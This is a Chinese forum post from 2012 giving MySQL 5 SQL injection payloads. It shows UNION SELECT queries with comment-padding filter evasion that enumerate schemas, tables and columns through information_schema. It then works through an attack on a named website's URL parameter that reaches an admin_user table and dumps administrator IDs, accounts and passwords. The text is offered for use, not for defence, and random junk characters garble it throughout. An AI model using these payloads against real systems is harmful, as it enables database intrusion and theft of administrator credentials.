查库$ R8 {5 E& r' \8 \ b( ^( a+ T9 W- |; P
" W/ r1 D$ ~# r. O Vid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/* ]; J, X7 y5 Q1 [4 ?- K) q! H
) o/ L$ K# l) {
查表
" L; m/ n6 L0 X5 e$ e/ ], ~! L; S1 o
1 W+ Y% z% D1 @7 X$ r7 O, gid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1! @# x5 R; R% D+ P1 L! F
$ Z9 w7 x2 S' f9 L+ `# {, p
查段6 t" \& @6 D7 ?
4 u' ?7 p q# ~# J i4 x3 p1 Gid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1 D Z% N8 S$ N) |- Z4 v' h6 P
+ L" k; ?9 l( N n1 C" f4 P0 s- n
0 a/ m |: k* p$ @, H! wmysql5高级注入方法暴表
# C+ n; y+ i' E* u0 e# K2 `% T/ T
例子如下:# t2 C) M5 y& E
% B" E1 U; d7 H* |- @8 ]+ n( y( g5 ?* v
1.爆表( p) D% g2 d9 X& z5 Z0 I
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)4 a1 E+ O/ [/ A7 ^' S. D* J
这样爆到第4个时出现了admin_user表。7 H4 I7 _" c# K/ b7 T
9 U( E) Z) ^- @* [9 e" ^& W2.暴字段' K/ r+ T4 |5 X6 z
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
4 ~# D3 m& P8 e8 g# ~" _) i7 m1 Y5 [& m+ K6 {8 a/ p
5 O& \, J& _; b3.爆密码3 c0 Y/ z6 p$ @+ |0 d7 P7 ?/ B5 f
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
& c, ~! Z& K9 L N( ^ [; y5 n2 P1 q4 M N' K
( O7 C/ a9 x4 s5 L5 \1 H
|
发表于 2012-9-13 16:29:37
收藏
支持
反对